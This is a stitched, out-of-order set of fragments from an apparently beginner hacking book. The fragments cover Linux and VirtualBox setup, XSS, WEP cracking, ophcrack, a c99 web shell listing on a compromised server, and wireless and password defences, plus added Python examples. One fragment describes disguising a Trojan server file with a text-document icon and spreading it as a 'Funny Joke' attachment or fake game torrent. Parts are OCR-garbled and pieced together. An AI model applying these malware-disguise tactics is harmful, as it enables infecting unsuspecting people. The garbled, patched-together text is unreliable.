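    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} from {f['ip']}: {', '.join(f['reasons'])}  {f['request']}")
```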
85. ses and Trojans that can easily bypass anti-virus programs.
Countermeasures
There are a couple of things you can do to prevent yourself from being infected by the malware discussed in this chapter.
1. Make sure you have good and up-to-date anti-virus software installed on your computer. Also, if there is an automatic update option on your anti-virus software, make sure it is enabled.
2. Make sure you have a firewall installed on your computer and make sure that it is actually enabled. Firewalls protect against unauthorized inbound and outbound connections.
Chapter Nine: Web Hacking
With the Web 2.0 era upon us, most websites are dynamic and allow the users to interact with the content. Many of the web applications that run these dynamic websites have security flaws. In this chapter we will discuss some of the most popular forms of attacks against web applications.
Cross Site Scripting
Cross site scripting (XSS) occurs when a user inputs malicious data into a website, which causes the application to do something it wasn't intended to do. XSS attacks are very popular and some of the biggest websites have been affected by them, including the FBI, CNN, Ebay, Apple, Microsoft and AOL. Some website features commonly vulnerable to XSS attacks are:
• Search Engines
• Login Forms
• Comment Fields
There are three types of XSS attacks:
1. Local: Local XSS attacks are by far the rarest and the hardest to pull off. This atta
86. sionals on there that will be able to help you when you get stuck. Practice, Practice, Practice! Think of ideas for fun programs that you could make, and program them.
Chapter Three: Linux
What is it?
Linux is a free, open-source, UNIX-like operating system. As you continue to learn how to hack, you will realize how important it is to learn how to use the Linux operating system. Need some convincing? Here are a couple of facts:
1. Millions of servers on the internet run on the Linux operating system. You must learn the operating system to be able to penetrate these web servers.
2. Some of the best hacking programs only run on Linux.
Choosing a distribution
A Linux distribution is the Linux kernel (the central component of an operating system) plus a collection of applications. If you are a beginner to Linux, I would suggest starting with Ubuntu as your first Linux distribution. It is simple to install and very user friendly. To see a full list of the most popular distributions you can go to http://distrowatch.com.
Running Linux
There are many ways to get Linux up and running. I will show you the most popular methods below.
Live CD
Live CDs are usually used to test and play around with a Linux distribution. With a Live CD you do not have to install the OS (operating system) onto your hard drive because it runs off the disc on boot. Because it is running off a disc, you won't be able to permanently modify any system file
87. ss networks. Under channels you will see a graph that shows the wireless network's signal strength. The more green and the fewer spaces, the better the signal. [Screenshot: the NetStumbler channel signal-strength graph]
5. As you can see, NetStumbler provides a lot more than just the name (SSID) of the wireless network. It provides the MAC address, channel number, encryption type and a bunch more. All of these come in use when a hacker decides he wants to get into the secured network by cracking the encryption. The most common types of encryption are:
• WEP (Wired Equivalent Privacy): WEP isn't considered safe anymore. Many flaws have been discovered that allow a hacker to crack a WEP key easily.
• WAP (Wireless Application Protocol): WAP is currently the most secure and best option to secure your wireless network. It's not as easily cracked as WEP because the only way to retrieve a WAP key is to use a brute-force or dictionary attack. If your key is secure enough, a dictionary attack won't work, and it could take decades to crack it if you brute force it. This is why most hackers don't even bother.
Cracking WEP
In this section we will be using the Live Linux distribution called BackTrack to crack WEP. Backtrack comes with a huge list of preloaded software for this very purpose. Before we begin there are a couple of requirements:
1. You need a computer with a compatible wireles
88. [Screenshot continued: the ubuntu.com download page. "The 8.04 version of Ubuntu receives long term support: 3 years for desktop versions and 5 years for server versions." You choose what type of computer you have (Standard personal computer, x86 architecture: Pentium, Celeron, Athlon, Sempron; or 64-bit AMD and Intel computers), choose a download location near you (United States, MIT Media Lab) and click "Start Download"; check the box if you need the alternate desktop CD, which does not include the Live CD and uses a text-based installer instead. The download URL shown is http://ubuntu.media.mit.edu/ubuntu-releases/hardy/ubuntu-8.04.1-desktop-i386.iso (Ubuntu Edition: Ubuntu 8.04.1 desktop, Computer Platform: i386), and Firefox then asks what to do with ubuntu-8.04.1-desktop-i386.iso]
89. stall or download from the internet, or install from files in a local directory. [Screenshot: Cygwin Setup "Choose Installation Type" with the options "Install from Internet (downloaded files will be kept for future re-use)", "Download Without Installing" and "Install from Local Directory"]
4. Continue on until it asks you to choose a mirror to download from. Choose any. [Screenshot: Cygwin Setup "Choose Download Site(s)" with the list of available download sites and a "User URL" box]
5. Next you must select packages to download. Click "View" under Devel to expand the category. Expand the window so that you can see all of the columns. Under the package column, search for gcc-core and click on "Skip" to select it, and click Next.
6. If it tells you that you haven't selected a couple of packages that you need, agree to install them and click Next.
7. It will begin to install the packages.
8. Once it is installed, double-click the desktop icon and a command prompt should come up.
9. Using the same exploit as the last example, save a
90. t. [Screenshot: c99shell v.1.0 beta (9.06.2005, "powered by Captain Crunch Security Team") listing a directory under public_html/news/admin/inc on the compromised server: 11 files and 0 directories, all owned by the site's account, including action.php, change_action.php, delete.php, delete_action.php, show.php and start.php dated 2004 to 2006, with the shell's command execute, search, upload, make dir, make file, go dir and go file controls below the listing]
The shell will display information ab
91. tensions button to continue. Here you choose what kind of server file to generate. I will stick with the default because it has icon support, but .exe files look suspicious, so it would be smart to change it. [Screenshot: the "Server Extensions" screen: EXE (has icon support), SCR (has icon support), PIF (has no icon support), COM (has no icon support), BAT (has no icon support); server size 342 KB]
8. Click on "Server Icon" to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon, since my file is a text document. [Screenshot: the "Server Icon" selection screen; server size 342 KB]
9. Finally, click on "Create Server" to, you guessed it, create the server file. Below is what my server file looks like. [Screenshot: the created file, named binded_server]
10. A hacker would probably rename it to something like "Funny Joke" and send it as an attachment to some people. A hacker could also put it up as a torrent, pretending it is something else, like the latest game that just came out, so he could get people to download it.
11. Now I will show you what happens when
92. the FTP software. Now most people would move on to another port to try and find another possible vulnerability, but this doesn't mean every hacker will. If a skillful hacker is determined, he may try to locate a vulnerability in the current software version and develop an exploit for it. In the hacker community this new vulnerability would be called a 0-day. 0-day vulnerabilities are very valuable in the hacker community for a few reasons:
• No one knows about the vulnerability, so the hacker could start hacking hundreds of websites before the vulnerability is discovered and patched.
• The hacker could sell the vulnerability for thousands of dollars.
• Discovering vulnerabilities and creating an exploit for them shows that the hacker is very skillful and raises his rank in the hacker community.
You might be wondering why 0-days are worth so much. It's very simple. I'll explain it with a simple equation: Hacker + 0-Day + Company Servers = Bad Reputation + Loss of Money.
Now, before we get into the actual penetrations, I will discuss a couple of the common types of attacks used against discovered vulnerabilities.
Denial of Service (DoS)
There are many types of DoS attacks, but they all have one purpose: to make the target server unavailable for legitimate users. The most common type of DoS attack is when the hacker sends a flood of information to the target server, causing it to use up all of its resources and in return pushing it offl
93. ttempting to peek. If there is, turn around and drop kick him/her in the face. No, not really. Also make sure you don't keep any sticky notes lying around that have your password or password hints on them.
Guessing
To prevent this attack from happening, never use a password like your birth date, your mother's maiden name, your pet's name, your spouse's name, or anything that someone may be able to guess.
Dictionary Attacks
Dictionary attacks are very simple to prevent. Don't use a password that is in the dictionary. Some people may think that if they use a word from the dictionary but replace most of the letters with a number, then they are safe. They are not. There are 1337-speak dictionaries out there too. Basically, what 1337 speak is, is changing a word like "animal" to "An1m41". For a secure password I would recommend using a phrase, such as "doyoulikecheese88".
Brute-force Attacks
Brute-force attacks may be prevented by creating a very long password and using many numbers and odd characters. The longer the password, the longer it takes for the hacker to crack it. If after a few days the hacker hasn't been able to crack your password through a brute-force attack, then he is very likely to just give up. Like I said in the dictionary attacks section, creating a phrase for your password is your best option for staying secure.
Rainbow Tables
You can avoid rainbow table cracking by simply making your password ext
94. [Screenshot continued: the ophcrack tables page listing the available rainbow tables with size, success rate and charset. XP german (7.4 GB, formerly known as german, success rate 99%): only for passwords that contain at least one German character. Vista free (461 MB, success rate 99%): charset based on a dictionary with variations (hybrid mode). Vista special (8.0 GB, formerly known as NTHASH, success rate 99%): passwords of length 6 or less over the full printable charset including the space character, passwords of length 7 over digits, lowercase and uppercase letters, and passwords of length 8 over digits and lowercase letters]
4. In the example I chose the largest possible free table. Next, run ophcrack and click on Tables. Select the table you downloaded and click Install to locate the file on your computer. Hit OK to continue. [Screenshot: the ophcrack Table Selection dialog listing XP free fast (on disk, in C:\Downloads\Rainbow Tables), XP free small, XP special, XP german v1, XP german v2, Vista special and Vista free as "not installed", with a legend for enabled, disabled and not installed]
5. Next
95. u can use the Live CD version to install Wubi if you followed the steps above and downloaded it. Or you can download the full 5 gigabyte version from http://wubi-installer.org.
1. If you downloaded the full 5 gigabyte file, double click it to run it. If you are using the previously downloaded Live CD version, then insert your Ubuntu Live CD. An Ubuntu CD menu should come up. [Screenshot: the Ubuntu CD Menu with two options. "Demo and Full installation": try Ubuntu without installing; simply reboot your machine with the CD in the tray; you may perform a full installation from within the demo to install Ubuntu either alongside Windows or as the only operating system. "Install inside Windows": install and uninstall Ubuntu like any other application without the need for a dedicated partition; you will be able to boot into either Windows or Ubuntu; hibernation is not enabled in this mode and disk performance is slightly reduced]
2. Choose "Install inside Windows".
3. In the next window, choose the appropriate options and click Install. [Screenshot: Ubuntu Setup: "You are about to install Ubuntu 8.04.1. Please select username and password for the new account", with the fields Installation Drive (69 GB free), Language (English), Installation Size (GB), Username and Password]
96. u choose to download lots of programs it won't be a problem. If you have limited drive space, you should go with a fixed-size image so that you don't have to worry about going over too much. [Screenshot: "Create New Virtual Disk", Virtual Disk Image Type: "A dynamically expanding image initially occupies a very small amount of space on your physical hard disk. It will grow dynamically (up to the size specified) as the Guest OS claims disk space. A fixed-size image does not grow. It is stored in a file of approximately the same size as the size of the virtual hard disk. The creation of a fixed-size image may take a long time depending on the image size and the write performance of your hard disk." Options: Dynamically expanding image / Fixed-size image]
9. Choose the amount of gigabytes you would like to dedicate to running Linux. I would go with 2 GB at the least. [Screenshot: "Create New Virtual Disk", Virtual Disk Location and Size: press the Select button to select the location and name of the file to store the virtual hard disk image, or type a file name in the entry field; select the size of the virtual hard disk image in megabytes; this size will be reported to the Guest OS as the size of the virtual hard disk]
10. Simply hit Finish. [Screenshot: "Create New Virtual Disk" summary: You are going to create a ne
97. virtual machine for VirtualBox. Use the Next button to go to the next page of the wizard and the Back button to return to the previous page.]
5. Name it and choose Ubuntu from the drop-down list. [Screenshot: "Create New Virtual Machine", VM Name and OS Type: enter a name for the new virtual machine and select the type of the guest operating system you plan to install onto the virtual machine. The name of the virtual machine usually indicates its software and hardware configuration. It will be used by all VirtualBox components to identify your virtual machine. Fields: Name, OS Type]
6. Choose the amount of RAM you would like to dedicate to running Linux. Choose about 1/4 of your total RAM. I have 2 gigs of RAM, so I chose 512 MB. [Screenshot: "Create New Virtual Machine", Memory: select the amount of base memory (RAM) in megabytes to be allocated to the virtual machine. The recommended base memory size is 256 MB. Base Memory Size slider from 4 MB to 3004 MB]
7. Hit Next. [Screenshot: "Create New Virtual Disk": Welcome to the Create New Virtual Disk Wizard. This wizard will help you to create a new virtual hard disk image for your virtual machine. Use the Next button to go to the next page of the wizard and the Back button to return to the previous page.]
Here we choose whether we would like to create a dynamic or fixed hard disk image. If you have lots of space on your hard disk, I would go with a dynamic image, so if yo
98. w wirtual hard disk image with the Following parameters Type Dynamically expanding image Location C Documents and Settings Dawid My VirtualBox VDT L Size 2 00 GB 2147493645 Bytes If the above settings are correct press the Finish button Once you press it a new hard disk image will be created 26 11 It automatically selects the image you just created Hit Next Create New Virtual Machine Virtual Hard Disk Select a hard disk image to be used as the boot hard disk of the virtual machine You can either create a new hard disk using the Mew button or select an existing hard disk image From the drop down list or by pressing the Existing button ito invoke the Virtual Disk Manager dialog TF you need a more complicated hard disk setup you can also skip this step and attach hard disks later using the YM Settings dialog The recommended size of the boot hard disk is 048 MB Boot Hard Disk Primary Master You are going to create a new virtual machine with the Following parameters Mame Ubuntu O5 Type Other Unknown Base Memory S12 ME Boot Hard Disk Ubuntu wdi fc Documents and Settings David Mi VirtualBox s im E IF the above is correct press the Finish button Once you press it a new virtual machine will be created Moke that you can alter these and all other setting of the created virtual machine at any time using the Settings dialog accessible through the menu of Ehe main window 27
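Steps 5 to 11 can also be reproduced without clicking through the wizard. The following is an added example, not part of the book: a Python script that drives VBoxManage, the command-line tool shipped with VirtualBox, with the same parameters as the walk-through (name Ubuntu, 512 MB of RAM, a 2 GB dynamically expanding disk). The file name Ubuntu.vdi and the controller name IDE are our choices, and VBoxManage is assumed to be on PATH.

```python
"""Reproduce the wizard's VM (steps 5 to 11) from the command line with VBoxManage.

Added example, not from the book. Assumes VBoxManage (shipped with VirtualBox)
is on PATH; the name, guest type, 512 MB of RAM and 2 GB dynamic disk are the
values used in the walk-through, and the file name Ubuntu.vdi is our choice.
"""
import subprocess
from pathlib import Path


def vbox_commands(name, ostype, memory_mb, disk_path, disk_mb, fixed=False):
    """Return the VBoxManage argument lists that match each wizard step.

    fixed=False is the wizard's "dynamically expanding image" (variant
    Standard); fixed=True is its "fixed size image" (variant Fixed).
    """
    variant = "Fixed" if fixed else "Standard"
    disk = str(disk_path)
    return [
        # step 5: name the VM and select the guest OS type
        ["VBoxManage", "createvm", "--name", name, "--ostype", ostype, "--register"],
        # step 6: base memory in MB
        ["VBoxManage", "modifyvm", name, "--memory", str(memory_mb)],
        # steps 8 to 10: create the virtual hard disk image
        ["VBoxManage", "createmedium", "disk", "--filename", disk,
         "--size", str(disk_mb), "--variant", variant],
        # step 11: attach it as the boot disk (IDE primary master, like the wizard)
        ["VBoxManage", "storagectl", name, "--name", "IDE", "--add", "ide"],
        ["VBoxManage", "storageattach", name, "--storagectl", "IDE",
         "--port", "0", "--device", "0", "--type", "hdd", "--medium", disk],
    ]


def create_vm(name="Ubuntu", ostype="Ubuntu", memory_mb=512,
              disk_path=Path("Ubuntu.vdi"), disk_mb=2048, fixed=False,
              dry_run=False):
    """Run the commands in order; with dry_run=True just return them.

    createmedium refuses to overwrite an existing file, so fail before
    createvm runs rather than leave a registered VM without a disk.
    """
    disk_path = Path(disk_path)
    if disk_path.exists():
        raise FileExistsError(f"{disk_path} already exists; pick another file name")
    cmds = vbox_commands(name, ostype, memory_mb, disk_path, disk_mb, fixed)
    if not dry_run:
        for cmd in cmds:
            subprocess.run(cmd, check=True)
    return cmds


if __name__ == "__main__":
    for cmd in create_vm(dry_run=True):
        print(" ".join(cmd))
```

`VBoxManage list ostypes` prints the identifiers accepted by `--ostype` (for example `Ubuntu_64` for a 64-bit guest), and `VBoxManage startvm Ubuntu` boots the result; the guest still needs the Ubuntu ISO attached as a DVD before it can install.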
you could follow to keep your wireless network safe from hackers:

1. Change your router's default password and make sure you have WPA encryption enabled (WPA2 if your router offers it). If your router doesn't have a WPA option, use WEP. It is better than nothing, but only barely: a WEP key can be recovered from captured traffic in minutes with freely available tools such as aircrack-ng, so treat it as a stopgap until the router is replaced.

2. Use a long, secure password for your router. Include numbers, lowercase letters, uppercase letters and other symbols. The more obscure the better.

3. Make sure your router has the option to not broadcast your SSID enabled. This will prevent some programs like NetStumbler from locating your wireless network. Be aware that hiding the SSID only blanks it in the beacon frames: it is still sent in the clear in every probe request, probe response and association request, so a passive sniffer such as Kismet or airodump-ng sees it as soon as one of your own devices connects. It deters casual scanners, nothing more.

4. Use MAC filtering on your router. Every wireless card and wireless adapter has a MAC address. By choosing to allow only your MAC addresses onto the network you can keep a lot of attackers out. The caveat is that MAC addresses travel unencrypted in the header of every frame, even on a WPA network, and an attacker can set their own card to a MAC they have seen with a single command (macchanger on Linux), so this stops only the least determined attackers.

5. To prevent packet sniffing attacks from affecting you, make sure the important sites you use, like banks, use SSL (Secure Sockets Layer, today superseded by its successor TLS) encryption. You can tell if the site has SSL enabled if the URL begins with https instead of http.

6. In cafés or other hotspots where internet is free, packet sniffing is very common. To avoid being affected, use a VPN (Virtual Private Network) service to encrypt the data you send across the internet.

Chapter Seven: Windows Hacking

NetBIOS

NetBIOS stands for Network Basic Input/Output System. It allows your LAN or WAN to share drives, folders, files and printers. Gaining access to a computer through NetBIOS is very simple and easy. The only thing requi
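The SSID-hiding and MAC-filtering tips in the wireless list above rely on the attacker not seeing information that 802.11 actually transmits in the clear. The following added example (not from the book) builds three constructed frames in code: a beacon from an access point with SSID broadcast disabled, the probe response that same access point still sends when one of its own clients asks for the network by name, and an encrypted data frame from an allowed client. A minimal parser then decodes what a passive sniffer gets for free. The BSSID 00:1a:2b:3c:4d:5e, the SSID HomeNet and the client MAC 00:11:22:33:44:55 are made-up values.

```python
"""Why hidden SSIDs and MAC filtering are weak: a passive sniffer still sees both.

Added example, not part of the book. The frames below are constructed in code
(no radio, no capture file) and decoded with a minimal 802.11 parser; the
BSSID, SSID and client MAC are made-up sample values.
"""
import struct

MGMT, DATA = 0, 2          # 802.11 frame types
BEACON, PROBE_RESP = 8, 5  # management subtypes
SSID_IE = 0                # information element tag carrying the SSID

BSSID = bytes.fromhex("001a2b3c4d5e")    # constructed access point address
CLIENT = bytes.fromhex("001122334455")   # constructed allowed client address
BROADCAST = b"\xff" * 6


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt(subtype, dst, ies):
    """Management frame: 24-byte header, beacon/probe-response fixed fields, IEs."""
    frame_control = bytes([(subtype << 4) | (MGMT << 2), 0x00])
    header = frame_control + b"\x00\x00" + dst + BSSID + BSSID + b"\x00\x00"
    fixed = struct.pack("<QHH", 0, 100, 0x0411)  # timestamp, interval, capability
    body = b"".join(bytes([tag, len(val)]) + val for tag, val in ies)
    return header + fixed + body


def build_data(to_ds=True, protected=True):
    """Encrypted data frame from the client to the AP; only the payload is ciphered."""
    flags = (0x40 if protected else 0x00) | (0x01 if to_ds else 0x00)
    frame_control = bytes([DATA << 2, flags])
    # ToDS=1: addr1 = BSSID (receiver), addr2 = client (transmitter), addr3 = final DA
    header = frame_control + b"\x00\x00" + BSSID + CLIENT + BROADCAST + b"\x00\x00"
    return header + b"\x00" * 8 + b"\xde\xad\xbe\xef"  # placeholder ciphertext


def parse_ssid(ie_bytes):
    """Walk the tagged parameters and return the SSID; '' means the AP hides it."""
    i = 0
    while i + 2 <= len(ie_bytes):
        tag, length = ie_bytes[i], ie_bytes[i + 1]
        value = ie_bytes[i + 2:i + 2 + length]
        if tag == SSID_IE:
            return value.decode("utf-8", "replace")
        i += 2 + length
    return None


def parse_frame(frame):
    """Decode the fields every frame exposes: addresses, SSID, protection flag."""
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    to_ds, protected = bool(fc1 & 0x01), bool(fc1 & 0x40)
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    info = {"type": ftype, "subtype": subtype, "protected": protected}
    if ftype == MGMT and subtype in (BEACON, PROBE_RESP):
        info["bssid"] = mac_str(addr3)
        info["ssid"] = parse_ssid(frame[24 + 12:])  # skip header and fixed fields
    elif ftype == DATA:
        # The header is never encrypted, so the client MAC is visible even under WPA.
        info["bssid"] = mac_str(addr1 if to_ds else addr2)
        info["client"] = mac_str(addr2 if to_ds else addr1)
    return info


def audit(frames):
    """Summarise what a passive observer learns from a handful of frames."""
    learned = {"ssids": set(), "clients": set()}
    for info in map(parse_frame, frames):
        if info.get("ssid"):          # non-empty SSID, here from the probe response
            learned["ssids"].add(info["ssid"])
        if "client" in info:
            learned["clients"].add(info["client"])
    return learned


# Constructed traffic: a "hidden" beacon (zero-length SSID), the probe response
# the AP must send when a legitimate client asks for the network by name, and
# one encrypted data frame from an allowed client.
SAMPLE_FRAMES = [
    build_mgmt(BEACON, BROADCAST, [(SSID_IE, b"")]),
    build_mgmt(PROBE_RESP, CLIENT, [(SSID_IE, b"HomeNet")]),
    build_data(),
]

if __name__ == "__main__":
    for frame in SAMPLE_FRAMES:
        print(parse_frame(frame))
    print(audit(SAMPLE_FRAMES))
```

The audit recovers the hidden network's name and an allowed client's MAC from three frames; a real capture from airodump-ng or Kismet yields the same fields, and macchanger then sets that MAC on the attacker's card. Keep the two tips if you like, but the control that actually matters in the list above is WPA2 with a strong passphrase.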
